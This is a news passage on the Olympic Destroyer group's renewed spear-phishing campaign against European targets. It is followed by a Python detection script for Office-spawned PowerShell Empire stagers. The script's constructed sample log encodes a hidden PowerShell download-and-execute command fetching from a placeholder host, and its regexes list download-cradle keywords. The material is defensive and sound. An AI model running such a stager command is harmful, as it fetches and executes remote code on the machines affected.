Kaspersky Lab researchers tracking the Olympic Destroyer threat that famously struck the opening of the Winter Olympic Games in PyeongChang with a destructive network worm have discovered that the hacking group behind it is still active. It appears to be targeting Germany, France, Switzerland, the Netherlands, Ukraine and Russia, with a focus on organizations involved in protection against chemical and biological threats.
Olympic Destroyer is an advanced threat that hit organizers, suppliers and partners of the 2018 Winter Olympic Games in PyeongChang, South Korea, with a cyber-sabotage operation based on a destructive network worm. Many indicators pointed in different directions as to the attack's origins, causing some confusion in the information-security industry in February 2018. A few rare and sophisticated signs discovered by Kaspersky Lab suggested that Lazarus group, a North Korea-linked threat actor, was behind the operation. However, in March, the company confirmed that the campaign featured an elaborate and convincing false flag operation, and that Lazarus was unlikely to be the source. Researchers have now found that the Olympic Destroyer operation is back in action, using some of its original infiltration and reconnaissance toolsets and focusing on targets in Europe.
The threat actor is spreading its malware through spear-phishing documents that closely resemble the weaponized documents used in preparation for the Winter Olympics operation. All final payloads extracted from the malicious documents were designed to provide generic access to the compromised computers. A free, open-source framework widely known as PowerShell Empire was used for the second stage of the attack.
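As an added example (not from the article and not Kaspersky Lab's own tooling), the following Python detection logic shows how a defender might hunt for the two behaviours described above: a document-borne first stage and a PowerShell Empire stager as the second stage. It parses process-creation events, decodes any `-EncodedCommand` payload, and scores each event on whether an Office application spawned a scripting host with a hidden window, an encoded command, or a download cradle. The log format, the process lists, the scoring weights and the sample events are all constructed assumptions for this example; the heuristic is a generic Empire-stager pattern, not a statement about what this campaign's documents actually did.

```python
import base64
import json
import re

# Process-creation parents/children of interest: an Office application is the
# usual parent when a weaponized document runs, and PowerShell is the host an
# Empire stager runs in. Both sets are assumptions chosen for this example.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe"}

ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_CRADLE = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|"
                             r"Invoke-WebRequest|Invoke-RestMethod|IEX\b|Invoke-Expression", re.I)


def encode_powershell(script: str) -> str:
    """Encode a script as PowerShell's -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload from a command line, or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE: treat as no encoded payload


def score_event(event: dict):
    """Score one process-creation event; returns (score, reasons, decoded_payload)."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    child = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["command_line"]
    score, reasons = 0, []
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        score += 2
        reasons.append("office_parent_spawned_shell")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score += 1
        reasons.append("encoded_command")
    if HIDDEN_WINDOW.search(cmdline):
        score += 1
        reasons.append("hidden_window")
    # Check the visible command line and the decoded payload for a download cradle.
    if DOWNLOAD_CRADLE.search(cmdline) or (decoded and DOWNLOAD_CRADLE.search(decoded)):
        score += 2
        reasons.append("download_cradle")
    return score, reasons, decoded


def parse_log(text: str):
    """Parse newline-delimited JSON events, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def detect(events, threshold: int = 3):
    """Return alerts for events whose combined score reaches the threshold."""
    alerts = []
    for ev in events:
        score, reasons, decoded = score_event(ev)
        if score >= threshold:
            alerts.append({"host": ev["host"], "score": score, "reasons": reasons,
                           "decoded": decoded, "command_line": ev["command_line"]})
    return alerts


# Constructed sample telemetry (made up for this example, not from the campaign):
# a stager-like launch from Word, benign PowerShell use, an Office print helper,
# and an encoded but harmless command launched from cmd.exe.
_STAGER = encode_powershell(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stager')")
_BENIGN = encode_powershell("Get-Process | Sort-Object CPU")
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"host": "WS-042", "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {_STAGER}"},
    {"host": "WS-007", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -Command Get-ChildItem C:\\Users"},
    {"host": "WS-042", "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe", "command_line": "splwow64.exe 12288"},
    {"host": "WS-013", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -w hidden -enc {_BENIGN}"},
])

if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(json.dumps(alert, indent=2))
```

Run against the constructed log, only the Word-spawned PowerShell event crosses the threshold; the hidden, encoded but harmless command from `cmd.exe` scores 2 and stays below it, which is why the rule combines several weak signals rather than alerting on `-enc` alone. Decoding the payload before matching matters because an Empire-style stager normally hides its download cradle inside the encoded command rather than on the visible command line.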